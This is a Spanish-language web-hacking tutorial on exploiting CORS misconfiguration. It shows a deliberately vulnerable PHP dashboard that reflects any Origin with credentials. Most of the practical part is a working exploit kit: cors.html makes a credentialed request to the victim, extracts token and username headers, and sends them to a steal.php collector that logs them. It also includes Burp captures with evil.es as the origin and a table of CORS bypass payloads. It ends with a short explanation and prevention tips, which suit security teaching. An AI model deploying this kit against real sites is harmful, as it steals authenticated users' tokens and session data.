CORS (Cross-Origin Resource Sharing)

Practica de explotación CORS

Imaginemos que tenemos esta pagina de aqui:

dashboard.php

<?php
session_start();
header('b0x-Powered-By: White beard Pirates 8-)');

// Verificar si el usuario está logueado
if (!isset($_SESSION['logged2']) || $_SESSION['logged2'] !== true) {
    header('Location: login.php', true, 302);
    exit;
}

// Configurar encabezados CORS
if (isset($_SERVER['HTTP_ORIGIN'])) {
    // Permitir el origen dinámicamente, dependiendo de la solicitud
    header("Access-Control-Allow-Origin: " . $_SERVER['HTTP_ORIGIN']);
    header('Access-Control-Allow-Credentials: true');

    // Especificar los encabezados que serán expuestos para CORS
    header('Access-Control-Expose-Headers: TOKEN, Access-Control-Allow-Origin, User-Name, Client-IP');
}

// Mostrar el token en la página
$api_token = $_SESSION['api_token'];

// Capturar el nombre de usuario de la sesión (ya que está logueado)
$username = $_SESSION['username'] ?? 'No username provided';  // Extraer el nombre de usuario desde la sesión
$client_ip = $_SERVER['REMOTE_ADDR'];  // La IP sigue siendo la de la solicitud (no cambia)


// Enviar el token, nombre de usuario y la IP en los encabezados de respuesta, solo si es una solicitud GET
if ($_SERVER['REQUEST_METHOD'] === 'GET' && !isset($_SERVER['HTTP_TOKEN'])) {
    // Añadir el token, nombre de usuario y la IP a los encabezados de la respuesta
    header('TOKEN: ' . $api_token);
    header('User-Name: ' . $username);
    header('Client-IP: ' . $client_ip);
}
?>

<!DOCTYPE html>
<html lang="es">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Dashboard</title>
</head>
<body>
    <div align="center" style="margin: 30px;">
        Bienvenido. Obtenga la respuesta HTTP de esta página web mediante una solicitud CORS. ¡Listo! Lección aprendida: nunca confíe en un "Origin:" arbitrario.
    </div>

    <p>Your API Token: <?= htmlspecialchars($api_token) ?></p>
    <p>Your Username: <?= htmlspecialchars($username) ?></p>
    <p>Your IP Address: <?= htmlspecialchars($client_ip) ?></p>

    <p>This token is also sent in the request headers as <strong>TOKEN</strong>.</p>

    <!-- Formulario para actualizar el perfil -->
    <form action="dashboard.php" method="POST">
        <label for="username">Nuevo usuario:</label>
        <input type="text" name="username" id="username" required><br>

        <label for="password">Nueva contraseña:</label>
        <input type="password" name="password" id="password" required><br>

        <!-- Campo oculto para enviar el API token en el POST -->
        <input type="hidden" name="api_token" value="<?= htmlspecialchars($api_token) ?>">

        <input type="submit" value="Actualizar perfil">
    </form>

    <script>
        // Enviar el token, nombre de usuario y IP como parte del encabezado de la solicitud GET
        fetch(window.location.href, {
            method: 'GET',
            headers: {
                'TOKEN': '<?= htmlspecialchars($api_token) ?>', // Enviar el token en el encabezado
                'User-Name': '<?= htmlspecialchars($username) ?>', // Enviar el nombre de usuario
                'Client-IP': '<?= htmlspecialchars($client_ip) ?>' // Enviar la IP del cliente
            }
        })
        .then(response => response.text())
        .then(data => {
            console.log('Request successful:', data);
        })
        .catch((error) => {
            console.error('Error:', error);
        });
    </script>

</body>
</html>

Veremos que esta parte de aqui es la vulnerable a CORS:

// Configurar encabezados CORS
if (isset($_SERVER['HTTP_ORIGIN'])) {
    // Permitir el origen dinámicamente, dependiendo de la solicitud
    header("Access-Control-Allow-Origin: " . $_SERVER['HTTP_ORIGIN']);
    header('Access-Control-Allow-Credentials: true');

    // Especificar los encabezados que serán expuestos para CORS
    header('Access-Control-Expose-Headers: TOKEN, Access-Control-Allow-Origin, User-Name, Client-IP');
}

Si entramos dentro de la pagina, veremos un login, las credenciales por defecto seran las siguiente:

User: user/admin
Pass: user/admin

Una vez que estemos dentro veremos algo asi:

Por lo que estamos viendo nos muestra la informacion del usuario, junto con su TOKEN, etc... Vamos a capturar la peticion con BuprSuite recargando la pagina y dentro de la misma añadiremos en la cabecera despues del parametro Connect lo siguiente:

Origin: http://evil.es

Nos quedara algo asi:

GET /dashboard.php HTTP/1.1
Host: 172.17.0.2
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/png,image/svg+xml,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Referer: http://172.17.0.2/
Connection: keep-alive
Origin: http://evil.es
Cookie: PHPSESSID=ist11l3vcbit5rqtqdnm68gqk8
Upgrade-Insecure-Requests: 1
Priority: u=0, i

Antes de enviarlo activaremos en BurpSuite el que obtengamos las respuestas del servidor:

Una vez activado vamos a enviarlo y veremos en la respuesta lo siguiente:

HTTP/1.1 200 OK
Date: Fri, 14 Mar 2025 17:11:39 GMT
Server: Apache/2.4.58 (Ubuntu)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
d1se0-Powered-By: White beard Pirates 8-)
Access-Control-Allow-Origin: http://evil.es
Access-Control-Allow-Credentials: true
Access-Control-Expose-Headers: TOKEN, Access-Control-Allow-Origin, User-Name, Client-IP
TOKEN: admin_token
User-Name: admin
Client-IP: 172.17.0.1
Vary: Accept-Encoding
Content-Length: 1853
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8

<HTML_PAGE>

Vemos que nos esta habilitando la conexion de forma insegura con nuestro servidor de la maquina atacante, por lo que vamos a crear un exploit y subirlo a nuestro apache2 del atacante, para habilitar una pagina maliciosa.

Access-Control-Allow-Origin: http://evil.es
Access-Control-Allow-Credentials: true

cors.html

<!DOCTYPE html>
<html lang="es">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>CORS Explotation</title>
    <script>
        // Función para enviar la solicitud GET manualmente
        function obtenerDatos() {
            var xhttp = new XMLHttpRequest();
            xhttp.onreadystatechange = function() {
                if (this.readyState == 4) {
                    if (this.status == 200) {
                        // Captura todos los encabezados de la respuesta
                        var headers = this.getAllResponseHeaders();
                        console.log("Response Headers: ");
                        console.log(headers); // Muestra todos los encabezados

                        // Asegúrate de que estás extrayendo correctamente el token, el nombre de usuario y la IP
                        var tokenMatch = headers.match(/token:\s*(\S+)/i);
                        var userNameMatch = headers.match(/user-name:\s*(\S+)/i);
                        var clientIpMatch = headers.match(/client-ip:\s*(\S+)/i);

                        // Mostrar el token, el nombre de usuario y la IP en la consola
                        if (tokenMatch && userNameMatch && clientIpMatch) {
                            console.log("TOKEN: " + tokenMatch[1]);
                            console.log("User Name: " + userNameMatch[1]);
                            console.log("Client IP: " + clientIpMatch[1]);

                            // Aquí vamos a hacer la solicitud POST para enviar estos datos al servidor
                            var data = {
                                token: tokenMatch[1],
                                username: userNameMatch[1],
                                ip: clientIpMatch[1]
                            };

                            // Enviar los datos al servidor para almacenarlos en un archivo .txt
                            var postRequest = new XMLHttpRequest();
                            postRequest.open("POST", "steal.php", true);
                            postRequest.setRequestHeader("Content-Type", "application/json");
                            postRequest.onreadystatechange = function() {
                                if (postRequest.readyState == 4 && postRequest.status == 200) {
                                    console.log("Datos guardados correctamente en el servidor.");
                                }
                            };
                            postRequest.send(JSON.stringify(data));  // Enviar los datos como JSON
                        } else {
                            console.log("No token, user-name, or client-ip found in the response.");
                        }
                    } else {
                        console.error("Failed to fetch API token. Status: " + this.status);
                    }
                }
            };

            // Realizar la solicitud GET a dashboard.php
            xhttp.open("GET", "http://<IP_VICTIM>/dashboard.php", true);  // Cambia la IP por la correcta si es necesario
            xhttp.withCredentials = true;  // Esto enviará la cookie PHPSESSID si es necesario
            xhttp.send();
        }

        // Función de validación
        function validar() {
            // La palabra estática a comparar
            const palabraCorrecta = "secreta";

            // Obtener el valor del campo de texto
            const palabraIngresada = document.getElementById("palabra").value;

            // Comparar la palabra ingresada con la palabra correcta
            if (palabraIngresada === palabraCorrecta) {
	            alert("¡Correcto!");
            } else {
                alert("Incorrecto, intenta nuevamente.");
            }
        }

        // Función para ejecutar el script clear.sh
        function ejecutarClear() {
            var xhttp = new XMLHttpRequest();
            xhttp.onreadystatechange = function() {
                if (this.readyState == 4 && this.status == 200) {
                    alert("Texto limpiado correctamente.");
                    console.log(this.responseText);  // Muestra el resultado del script en la consola
                }
            };
            // Enviar una solicitud GET a clear.php para ejecutar el script
            xhttp.open("GET", "clear.php?action=clear", true);
            xhttp.send();
        }
    </script>
</head>
<body>
    <div align="center" style="margin: 30px;">
        Explotacion de CORS! By d1se0.
    </div>

    <p>Your API Token: <span id="api-token">No token</span></p>

    <!-- Botón para enviar la solicitud GET manualmente -->
    <button onclick="obtenerDatos()">Obtener Datos</button>
    <!-- Formulario para validar la palabra -->
    <h3>Verifica tu palabra</h3>
    <label for="palabra">Introduce la palabra:</label>
    <input type="text" id="palabra" placeholder="Escribe aquí">
    <button onclick="validar()">Validar</button>

	<!-- Botón para ejecutar el script clear.sh -->
    <button onclick="ejecutarClear()">Limpiar stolen_tokens.txt</button>
</body>
</html>

(Cambiamos la parte de <IP_VICTIM> por la IP de la maquina victima donde esta la vulnerabilidad)

Tambien tendremos que crear lo que va a procesar la solicitud y volcarlo en un .txt para que lo podamos ver:

steal.php

<?php
// Obtener los datos JSON del cuerpo de la solicitud
$data = json_decode(file_get_contents("php://input"), true);

// Verificar si el token, nombre de usuario y IP están presentes
if (isset($data['token'], $data['username'], $data['ip'])) {
    // Abrir el archivo para escribir los datos
    $file = fopen('stolen_tokens.txt', 'a');  // 'a' abre el archivo para agregar datos
    if ($file) {
        // Escribir los datos en el archivo
        fwrite($file, "Token: " . $data['token'] . "\n");
        fwrite($file, "Username: " . $data['username'] . "\n");
        fwrite($file, "IP Address: " . $data['ip'] . "\n");
        fwrite($file, "----------------------\n");
        fclose($file);
        echo "Datos guardados correctamente.";
    } else {
        echo "Error al abrir el archivo para escribir los datos.";
    }
} else {
    echo "Faltan datos: token, username o ip.";
}
?>

Tambien crearemos un archivo llamado stolen_tokens.txt que este en el mismo directorio.

OPCIONAL

Si queremos borrar el contenido del archivo stolen_tokens.txt para realizar de forma sucesiva el ataque, podremos crear lo siguiente:

clear.php

<?php
// clear.php
if (isset($_GET['action']) && $_GET['action'] == 'clear') {
    // Ruta al script bash (asegúrate de que la ruta es correcta y el script tenga permisos de ejecución)
    $output = shell_exec('/var/www/html/clear.sh');

    // Si el script devuelve algún resultado, lo mostramos
    if ($output) {
        echo "<pre>$output</pre>";
    } else {
        echo "El script se ejecutó correctamente pero no devolvió salida.";
    }
}
?>

Y en el mismo directorio tendra que ir el siguiente archivo:

clear.sh

#!/bin/bash 

echo "" > stolen_tokens.txt 
echo "Texto limpiado!"

Todo este contenido del exploit tiene que estar en nuestro /var/www/html e iniciaremos el servicio de apache2:

service apache2 start

Ahora tendremos que acceder a nuestro cors.html desde la web:

URL = http://<IP_ATTACKER>/cors.html

Ahora estando a la escucha con BurpSuite tendremos que darle al boton Obtener Datos. BurpSuite capturara la peticion y cambiaremos la parte de Cookie: PHPSESSID=<COOKIE_VICTIM> quedando algo asi:

GET /dashboard.php HTTP/1.1
Host: 172.17.0.2
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Origin: http://192.168.60.131
Connection: keep-alive
Referer: http://192.168.60.131/
Cookie: PHPSESSID=ist11l3vcbit5rqtqdnm68gqk8
Priority: u=0

Y si le damos al boton directamente de Intercep on veremos en la consola que salio todo perfecto:

Y si vamos al archivo donde se guarda todo, veremos que funciono:

Token: admin_token
Username: admin
IP Address: 172.17.0.1
----------------------

Ahora si probamos a meter donde la pagina de cors.html en TOKEN del usuario admin en este campo:

Veremos que es el correcto, por lo que habremos aprovechado de forma corercta la obtencion de informacion como el TOKEN del usuario, aprovechando la vulnerabilidad CORS y haciendo que el servidor confie en el origen de nuestro servidor.

Explicación detallada de CORS

Vulnerabilidad CORS en Hacking Web

¿Qué es CORS?

CORS (Cross-Origin Resource Sharing) es un mecanismo de seguridad implementado en los navegadores web que restringe las solicitudes HTTP de origen cruzado. Esto significa que una página web en un dominio (ejemplo.com) no puede hacer solicitudes AJAX a otro dominio diferente (api.otrodominio.com), a menos que el servidor de destino lo permita explícitamente mediante cabeceras HTTP.

¿Cómo funciona CORS?

Cuando una aplicación web hace una petición a un dominio diferente, el navegador agrega la cabecera Origin en la solicitud. El servidor debe responder con la cabecera Access-Control-Allow-Origin para indicar si permite o no la petición desde ese origen.

Ejemplo de una solicitud CORS:

GET /datos HTTP/1.1
Host: api.otrodominio.com
Origin: https://ejemplo.com

Si el servidor permite la petición, responderá con:

HTTP/1.1 200 OK
Access-Control-Allow-Origin: https://ejemplo.com

Si no está permitido, el navegador bloqueará la respuesta.

¿Cómo se explota CORS en hacking web?

Una mala configuración de CORS puede permitir a un atacante robar datos sensibles de un usuario autenticado en una aplicación web. Algunas configuraciones peligrosas incluyen:

Permitir cualquier origen (*)

Si el servidor responde con:

Access-Control-Allow-Origin: *

Entonces cualquier sitio puede hacer solicitudes al servidor y acceder a la respuesta.

Reflejar el valor del Origin

Algunos servidores devuelven el valor de la cabecera Origin en Access-Control-Allow-Origin sin validación:

Access-Control-Allow-Origin: https://malicioso.com

Esto permite a un atacante alojar un sitio malicioso y robar datos de los usuarios autenticados en el dominio víctima.

Permitir credenciales con configuraciones inseguras

Si el servidor permite credenciales (cookies, tokens, etc.) con Access-Control-Allow-Credentials: true y combina esto con Access-Control-Allow-Origin: *, entonces un atacante puede robar sesiones de usuarios.

Access-Control-Allow-Origin: *
Access-Control-Allow-Credentials: true

Esta combinación es extremadamente peligrosa.

Payloads y Bypasses para Explotación de CORS

Escenario
Payload/Bypass

Prueba básica de CORS

fetch('https://victima.com/endpoint', {credentials: 'include'}).then(res => res.text()).then(data => console.log(data))

Comprobar si el servidor refleja Origin

Origin: https://attacker.com

Bypass cuando Access-Control-Allow-Origin usa null

sandboxed iframe o data:// scheme

Usar subdominios para explotar regex débil

https://sub.attacker.com si el servidor permite *.attacker.com

Engañar validaciones débiles de dominio

https://trusted.com.attacker.com si el servidor usa endsWith() en validación

¿Cómo prevenir ataques CORS?

  • No usar Access-Control-Allow-Origin: * en servicios con información sensible.

  • No reflejar el valor de Origin sin validarlo correctamente.

  • Evitar Access-Control-Allow-Credentials: true a menos que sea estrictamente necesario.

  • Usar una lista blanca de orígenes permitidos en el servidor.

Conclusión

La vulnerabilidad CORS ocurre cuando la configuración del servidor permite orígenes no confiables acceder a datos sensibles. Es una de las fallas más comunes en aplicaciones web y puede tener consecuencias graves si se combina con el robo de credenciales o datos de usuarios autenticados. Configurar CORS correctamente es fundamental para la seguridad web.

Last updated